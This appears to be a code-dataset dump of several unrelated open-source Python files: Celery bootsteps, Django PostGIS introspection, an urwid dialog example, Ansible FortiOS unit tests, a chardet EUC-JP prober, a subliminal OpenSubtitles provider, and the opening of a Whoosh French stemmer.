return getattr(self.obj, 'terminate', self.obj.stop)()
def include(self, parent):
inc, ret = self._should_include(parent)
if inc:
self.obj = ret
parent.steps.append(self)
return inc
class ConsumerStep(StartStopStep):
"""Bootstep that starts a message consumer."""
requires = ('celery.worker.consumer:Connection',)
consumers = None
def get_consumers(self, channel):
raise NotImplementedError('missing get_consumers')
def start(self, c):
channel = c.connection.channel()
self.consumers = self.get_consumers(channel)
for consumer in self.consumers or []:
consumer.consume()
def stop(self, c):
self._close(c, True)
def shutdown(self, c):
self._close(c, False)
def _close(self, c, cancel_consumers=True):
channels = set()
for consumer in self.consumers or []:
if cancel_consumers:
ignore_errors(c.connection, consumer.cancel)
if consumer.channel:
channels.add(consumer.channel)
for channel in channels:
ignore_errors(c.connection, channel.close)
|
apache-2.0
|
davgibbs/django
|
django/contrib/gis/db/backends/postgis/introspection.py
|
330
|
5441
|
from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.postgresql.introspection import DatabaseIntrospection
class GeoIntrospectionError(Exception):
pass
class PostGISIntrospection(DatabaseIntrospection):
# Reverse dictionary for PostGIS geometry types not populated until
# introspection is actually performed.
postgis_types_reverse = {}
ignored_tables = DatabaseIntrospection.ignored_tables + [
'geography_columns',
'geometry_columns',
'raster_columns',
'spatial_ref_sys',
'raster_overviews',
]
# Overridden from parent to include raster indices in retrieval.
# Raster indices have pg_index.indkey value 0 because they are an
# expression over the raster column through the ST_ConvexHull function.
# So the default query has to be adapted to include raster indices.
_get_indexes_query = """
SELECT DISTINCT attr.attname, idx.indkey, idx.indisunique, idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx, pg_catalog.pg_attribute attr
LEFT JOIN pg_catalog.pg_type t ON t.oid = attr.atttypid
WHERE
c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND attr.attrelid = c.oid
AND (
attr.attnum = idx.indkey[0] OR
(t.typname LIKE 'raster' AND idx.indkey = '0')
)
AND attr.attnum > 0
AND c.relname = %s"""
def get_postgis_types(self):
"""
Returns a dictionary with keys that are the PostgreSQL object
identification integers for the PostGIS geometry and/or
geography types (if supported).
"""
field_types = [
('geometry', 'GeometryField'),
# The value for the geography type is actually a tuple
# to pass in the `geography=True` keyword to the field
# definition.
('geography', ('GeometryField', {'geography': True})),
]
postgis_types = {}
# The OID integers associated with the geometry type may
# be different across versions; hence, this is why we have
# to query the PostgreSQL pg_type table corresponding to the
# PostGIS custom data types.
oid_sql = 'SELECT "oid" FROM "pg_type" WHERE "typname" = %s'
cursor = self.connection.cursor()
try:
for field_type in field_types:
cursor.execute(oid_sql, (field_type[0],))
for result in cursor.fetchall():
postgis_types[result[0]] = field_type[1]
finally:
cursor.close()
return postgis_types
def get_field_type(self, data_type, description):
if not self.postgis_types_reverse:
# If the PostGIS types reverse dictionary is not populated, do so
# now. In order to prevent unnecessary requests upon connection
# initialization, the `data_types_reverse` dictionary is not updated
# with the PostGIS custom types until introspection is actually
# performed -- in other words, when this function is called.
self.postgis_types_reverse = self.get_postgis_types()
self.data_types_reverse.update(self.postgis_types_reverse)
return super(PostGISIntrospection, self).get_field_type(data_type, description)
def get_geometry_type(self, table_name, geo_col):
"""
The geometry type OID used by PostGIS does not indicate the particular
type of field that a geometry column is (e.g., whether it's a
PointField or a PolygonField). Thus, this routine queries the PostGIS
metadata tables to determine the geometry type,
"""
cursor = self.connection.cursor()
try:
try:
# First seeing if this geometry column is in the `geometry_columns`
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geometry_columns" '
'WHERE "f_table_name"=%s AND "f_geometry_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise GeoIntrospectionError
except GeoIntrospectionError:
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geography_columns" '
'WHERE "f_table_name"=%s AND "f_geography_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise Exception('Could not find a geometry or geography column for "%s"."%s"' %
(table_name, geo_col))
# OGRGeomType does not require GDAL and makes it easy to convert
# from OGC geom type name to Django field.
field_type = OGRGeomType(row[2]).django
# Getting any GeometryField keyword arguments that are not the default.
dim = row[0]
srid = row[1]
field_params = {}
if srid != 4326:
field_params['srid'] = srid
if dim != 2:
field_params['dim'] = dim
finally:
cursor.close()
return field_type, field_params
|
bsd-3-clause
|
urwid/urwid
|
examples/dialog.py
|
3
|
10254
|
#!/usr/bin/env python
#
# Urwid example similar to dialog(1) program
# Copyright (C) 2004-2009 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
"""
Urwid example similar to dialog(1) program
"""
import sys
import urwid
class DialogExit(Exception):
pass
class DialogDisplay:
palette = [
('body','black','light gray', 'standout'),
('border','black','dark blue'),
('shadow','white','black'),
('selectable','black', 'dark cyan'),
('focus','white','dark blue','bold'),
('focustext','light gray','dark blue'),
]
def __init__(self, text, height, width, body=None):
width = int(width)
if width <= 0:
width = ('relative', 80)
height = int(height)
if height <= 0:
height = ('relative', 80)
self.body = body
if body is None:
# fill space with nothing
body = urwid.Filler(urwid.Divider(),'top')
self.frame = urwid.Frame( body, focus_part='footer')
if text is not None:
self.frame.header = urwid.Pile( [urwid.Text(text),
urwid.Divider()] )
w = self.frame
# pad area around listbox
w = urwid.Padding(w, ('fixed left',2), ('fixed right',2))
w = urwid.Filler(w, ('fixed top',1), ('fixed bottom',1))
w = urwid.AttrWrap(w, 'body')
# "shadow" effect
w = urwid.Columns( [w,('fixed', 2, urwid.AttrWrap(
urwid.Filler(urwid.Text(('border',' ')), "top")
,'shadow'))])
w = urwid.Frame( w, footer =
urwid.AttrWrap(urwid.Text(('border',' ')),'shadow'))
# outermost border area
w = urwid.Padding(w, 'center', width )
w = urwid.Filler(w, 'middle', height )
w = urwid.AttrWrap( w, 'border' )
self.view = w
def add_buttons(self, buttons):
l = []
for name, exitcode in buttons:
b = urwid.Button( name, self.button_press )
b.exitcode = exitcode
b = urwid.AttrWrap( b, 'selectable','focus' )
l.append( b )
self.buttons = urwid.GridFlow(l, 10, 3, 1, 'center')
self.frame.footer = urwid.Pile( [ urwid.Divider(),
self.buttons ], focus_item = 1)
def button_press(self, button):
raise DialogExit(button.exitcode)
def main(self):
self.loop = urwid.MainLoop(self.view, self.palette)
try:
self.loop.run()
except DialogExit as e:
return self.on_exit( e.args[0] )
def on_exit(self, exitcode):
return exitcode, ""
class InputDialogDisplay(DialogDisplay):
def __init__(self, text, height, width):
self.edit = urwid.Edit()
body = urwid.ListBox(urwid.SimpleListWalker([self.edit]))
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, text, height, width, body)
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.view.keypress( size, k )
def on_exit(self, exitcode):
return exitcode, self.edit.get_edit_text()
class TextDialogDisplay(DialogDisplay):
def __init__(self, file, height, width):
l = []
# read the whole file (being slow, not lazy this time)
for line in open(file).readlines():
l.append( urwid.Text( line.rstrip() ))
body = urwid.ListBox(urwid.SimpleListWalker(l))
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, None, height, width, body)
def unhandled_key(self, size, k):
if k in ('up','page up','down','page down'):
self.frame.set_focus('body')
self.view.keypress( size, k )
self.frame.set_focus('footer')
class ListDialogDisplay(DialogDisplay):
def __init__(self, text, height, width, constr, items, has_default):
j = []
if has_default:
k, tail = 3, ()
else:
k, tail = 2, ("no",)
while items:
j.append( items[:k] + tail )
items = items[k:]
l = []
self.items = []
for tag, item, default in j:
w = constr( tag, default=="on" )
self.items.append(w)
w = urwid.Columns( [('fixed', 12, w),
urwid.Text(item)], 2 )
w = urwid.AttrWrap(w, 'selectable','focus')
l.append(w)
lb = urwid.ListBox(urwid.SimpleListWalker(l))
lb = urwid.AttrWrap( lb, "selectable" )
DialogDisplay.__init__(self, text, height, width, lb )
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.buttons.set_focus(0)
self.view.keypress( size, k )
def on_exit(self, exitcode):
"""Print the tag of the item selected."""
if exitcode != 0:
return exitcode, ""
s = ""
for i in self.items:
if i.get_state():
s = i.get_label()
break
return exitcode, s
class CheckListDialogDisplay(ListDialogDisplay):
def on_exit(self, exitcode):
"""
Mimic dialog(1)'s --checklist exit.
Put each checked item in double quotes with a trailing space.
"""
if exitcode != 0:
return exitcode, ""
l = []
for i in self.items:
if i.get_state():
l.append(i.get_label())
return exitcode, "".join(['"'+tag+'" ' for tag in l])
class MenuItem(urwid.Text):
"""A custom widget for the --menu option"""
def __init__(self, label):
urwid.Text.__init__(self, label)
self.state = False
def selectable(self):
return True
def keypress(self,size,key):
if key == "enter":
self.state = True
raise DialogExit(0)
return key
def mouse_event(self,size,event,button,col,row,focus):
if event=='mouse release':
self.state = True
raise DialogExit(0)
return False
def get_state(self):
return self.state
def get_label(self):
text, attr = self.get_text()
return text
def do_checklist(text, height, width, list_height, *items):
def constr(tag, state):
return urwid.CheckBox(tag, state)
d = CheckListDialogDisplay( text, height, width, constr, items, True)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_inputbox(text, height, width):
d = InputDialogDisplay( text, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_menu(text, height, width, menu_height, *items):
def constr(tag, state ):
return MenuItem(tag)
d = ListDialogDisplay(text, height, width, constr, items, False)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_msgbox(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("OK", 0) ])
return d
def do_radiolist(text, height, width, list_height, *items):
radiolist = []
def constr(tag, state, radiolist=radiolist):
return urwid.RadioButton(radiolist, tag, state)
d = ListDialogDisplay( text, height, width, constr, items, True )
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_textbox(file, height, width):
d = TextDialogDisplay( file, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_yesno(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("Yes", 0), ("No", 1) ])
return d
MODES={ '--checklist': (do_checklist,
"text height width list-height [ tag item status ] ..."),
'--inputbox': (do_inputbox,
"text height width"),
'--menu': (do_menu,
"text height width menu-height [ tag item ] ..."),
'--msgbox': (do_msgbox,
"text height width"),
'--radiolist': (do_radiolist,
"text height width list-height [ tag item status ] ..."),
'--textbox': (do_textbox,
"file height width"),
'--yesno': (do_yesno,
"text height width"),
}
def show_usage():
"""
Display a helpful usage message.
"""
modelist = [(mode, help) for (mode, (fn, help)) in MODES.items()]
modelist.sort()
sys.stdout.write(
__doc__ +
"\n".join(["%-15s %s"%(mode,help) for (mode,help) in modelist])
+ """
height and width may be set to 0 to auto-size.
list-height and menu-height are currently ignored.
status may be either on or off.
""" )
def main():
if len(sys.argv) < 2 or sys.argv[1] not in MODES:
show_usage()
return
# Create a DialogDisplay instance
fn, help = MODES[sys.argv[1]]
d = fn( * sys.argv[2:] )
# Run it
exitcode, exitstring = d.main()
# Exit
if exitstring:
sys.stderr.write(exitstring+"\n")
sys.exit(exitcode)
if __name__=="__main__":
main()
|
lgpl-2.1
|
pdellaert/ansible
|
test/units/modules/network/fortios/test_fortios_user_peer.py
|
21
|
11827
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_peer
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_peer.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_peer_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_peer_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_peer_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'peer', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_peer_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'peer', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_peer_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_peer_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'random_attribute_not_valid': 'tag',
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
gpl-3.0
|
jackkiej/SickRage
|
lib/chardet/eucjpprober.py
|
53
|
3666
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .enums import ProbingState, MachineState
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJP_SM_MODEL
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
super(EUCJPProber, self).__init__()
self.coding_sm = CodingStateMachine(EUCJP_SM_MODEL)
self.distribution_analyzer = EUCJPDistributionAnalysis()
self.context_analyzer = EUCJPContextAnalysis()
self.reset()
def reset(self):
super(EUCJPProber, self).reset()
self.context_analyzer.reset()
@property
def charset_name(self):
return "EUC-JP"
def feed(self, byte_str):
for i in range(len(byte_str)):
# PY3K: byte_str is a byte array, so byte_str[i] is an int, not a byte
coding_state = self.coding_sm.next_state(byte_str[i])
if coding_state == MachineState.error:
self.logger.debug('%s prober hit error at byte %s',
self.charset_name, i)
self._state = ProbingState.not_me
break
elif coding_state == MachineState.its_me:
self._state = ProbingState.found_it
break
elif coding_state == MachineState.start:
char_len = self.coding_sm.get_current_charlen()
if i == 0:
self._last_char[1] = byte_str[0]
self.context_analyzer.feed(self._last_char, char_len)
self.distribution_analyzer.feed(self._last_char, char_len)
else:
self.context_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
self._last_char[0] = byte_str[-1]
if self.state == ProbingState.detecting:
if (self.context_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)):
self._state = ProbingState.found_it
return self.state
def get_confidence(self):
context_conf = self.context_analyzer.get_confidence()
distrib_conf = self.distribution_analyzer.get_confidence()
return max(context_conf, distrib_conf)
|
gpl-3.0
|
blissland/devflixx
|
lib/subliminal/subliminal/providers/opensubtitles.py
|
1
|
8161
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import base64
import logging
import os
import re
import zlib
import babelfish
import guessit
from . import Provider
from .. import __version__
from ..compat import ServerProxy, TimeoutTransport
from ..exceptions import ProviderError, AuthenticationError, DownloadLimitExceeded
from ..subtitle import Subtitle, fix_line_endings, compute_guess_matches
from ..video import Episode, Movie
logger = logging.getLogger(__name__)
class OpenSubtitlesSubtitle(Subtitle):
provider_name = 'opensubtitles'
series_re = re.compile('^"(?P<series_name>.*)" (?P<series_title>.*)$')
def __init__(self, language, hearing_impaired, id, matched_by, movie_kind, hash, movie_name, movie_release_name, # @ReservedAssignment
movie_year, movie_imdb_id, series_season, series_episode, page_link):
super(OpenSubtitlesSubtitle, self).__init__(language, hearing_impaired, page_link)
self.id = id
self.matched_by = matched_by
self.movie_kind = movie_kind
self.hash = hash
self.movie_name = movie_name
self.movie_release_name = movie_release_name
self.movie_year = movie_year
self.movie_imdb_id = movie_imdb_id
self.series_season = series_season
self.series_episode = series_episode
@property
def series_name(self):
return self.series_re.match(self.movie_name).group('series_name')
@property
def series_title(self):
return self.series_re.match(self.movie_name).group('series_title')
def compute_matches(self, video):
matches = set()
# episode
if isinstance(video, Episode) and self.movie_kind == 'episode':
# series
if video.series and self.series_name.lower() == video.series.lower():
matches.add('series')
# season
if video.season and self.series_season == video.season:
matches.add('season')
# episode
if video.episode and self.series_episode == video.episode:
matches.add('episode')
# guess
matches |= compute_guess_matches(video, guessit.guess_episode_info(self.movie_release_name + '.mkv'))
# movie
elif isinstance(video, Movie) and self.movie_kind == 'movie':
# year
if video.year and self.movie_year == video.year:
matches.add('year')
# guess
if self.movie_release_name.strip():
matches |= compute_guess_matches(video, guessit.guess_movie_info(self.movie_release_name + '.mkv'))
else:
logger.info('%r is not a valid movie_kind for %r', self.movie_kind, video)
return matches
# hash
if 'opensubtitles' in video.hashes and self.hash == video.hashes['opensubtitles']:
matches.add('hash')
# imdb_id
if video.imdb_id and self.movie_imdb_id == video.imdb_id:
matches.add('imdb_id')
# title
if video.title and self.movie_name.lower() == video.title.lower():
matches.add('title')
return matches
class OpenSubtitlesProvider(Provider):
languages = {babelfish.Language.fromopensubtitles(l) for l in babelfish.language_converters['opensubtitles'].codes}
def __init__(self):
self.server = ServerProxy('http://api.opensubtitles.org/xml-rpc', transport=TimeoutTransport(10))
self.token = None
def initialize(self):
response = checked(self.server.LogIn('', '', 'eng', 'subliminal v%s' % __version__.split('-')[0]))
self.token = response['token']
def terminate(self):
checked(self.server.LogOut(self.token))
self.server.close()
def no_operation(self):
checked(self.server.NoOperation(self.token))
def query(self, languages, hash=None, size=None, imdb_id=None, query=None, season=None, episode=None): # @ReservedAssignment
searches = []
if hash and size:
searches.append({'moviehash': hash, 'moviebytesize': str(size)})
if imdb_id:
searches.append({'imdbid': imdb_id})
if query and season and episode:
searches.append({'query': query, 'season': season, 'episode': episode})
elif query:
searches.append({'query': query})
if not searches:
raise ValueError('One or more parameter missing')
for search in searches:
search['sublanguageid'] = ','.join(l.opensubtitles for l in languages)
logger.debug('Searching subtitles %r', searches)
response = checked(self.server.SearchSubtitles(self.token, searches))
if not response['data']:
logger.debug('No subtitle found')
return []
return [OpenSubtitlesSubtitle(babelfish.Language.fromopensubtitles(r['SubLanguageID']),
bool(int(r['SubHearingImpaired'])), r['IDSubtitleFile'], r['MatchedBy'],
r['MovieKind'], r['MovieHash'], r['MovieName'], r['MovieReleaseName'],
int(r['MovieYear']) if r['MovieYear'] else None, int(r['IDMovieImdb']),
int(r['SeriesSeason']) if r['SeriesSeason'] else None,
int(r['SeriesEpisode']) if r['SeriesEpisode'] else None, r['SubtitlesLink'])
for r in response['data']]
def list_subtitles(self, video, languages):
query = None
season = None
episode = None
if ('opensubtitles' not in video.hashes or not video.size) and not video.imdb_id:
query = video.name.split(os.sep)[-1]
if isinstance(video, Episode):
query = video.series
season = video.season
episode = video.episode
return self.query(languages, hash=video.hashes.get('opensubtitles'), size=video.size, imdb_id=video.imdb_id,
query=query, season=season, episode=episode)
def download_subtitle(self, subtitle):
response = checked(self.server.DownloadSubtitles(self.token, [subtitle.id]))
if not response['data']:
raise ProviderError('Nothing to download')
subtitle.content = fix_line_endings(zlib.decompress(base64.b64decode(response['data'][0]['data']), 47))
class OpenSubtitlesError(ProviderError):
"""Base class for non-generic :class:`OpenSubtitlesProvider` exceptions"""
class Unauthorized(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '401 Unauthorized'"""
class NoSession(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '406 No session'"""
class DownloadLimitReached(OpenSubtitlesError, DownloadLimitExceeded):
"""Exception raised when status is '407 Download limit reached'"""
class InvalidImdbid(OpenSubtitlesError):
"""Exception raised when status is '413 Invalid ImdbID'"""
class UnknownUserAgent(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '414 Unknown User Agent'"""
class DisabledUserAgent(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '415 Disabled user agent'"""
class ServiceUnavailable(OpenSubtitlesError):
"""Exception raised when status is '503 Service Unavailable'"""
def checked(response):
"""Check a response status before returning it
:param response: a response from a XMLRPC call to OpenSubtitles
:return: the response
:raise: :class:`OpenSubtitlesError`
"""
status_code = int(response['status'][:3])
if status_code == 401:
raise Unauthorized
if status_code == 406:
raise NoSession
if status_code == 407:
raise DownloadLimitReached
if status_code == 413:
raise InvalidImdbid
if status_code == 414:
raise UnknownUserAgent
if status_code == 415:
raise DisabledUserAgent
if status_code == 503:
raise ServiceUnavailable
if status_code != 200:
raise OpenSubtitlesError(response['status'])
return response
|
gpl-2.0
|
johankaito/fufuka
|
microblog/old-flask/lib/python2.7/site-packages/whoosh/lang/snowball/french.py
|
96
|
14461
|
from .bases import _StandardStemmer
from whoosh.compat import u
class FrenchStemmer(_StandardStemmer):
"""
The French Snowball stemmer.
:cvar __vowels: The French vowels.
:type __vowels: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2a_suffixes: Suffixes to be deleted in step 2a of the algorithm.
:type __step2a_suffixes: tuple
:cvar __step2b_suffixes: Suffixes to be deleted in step 2b of the algorithm.
:type __step2b_suffixes: tuple
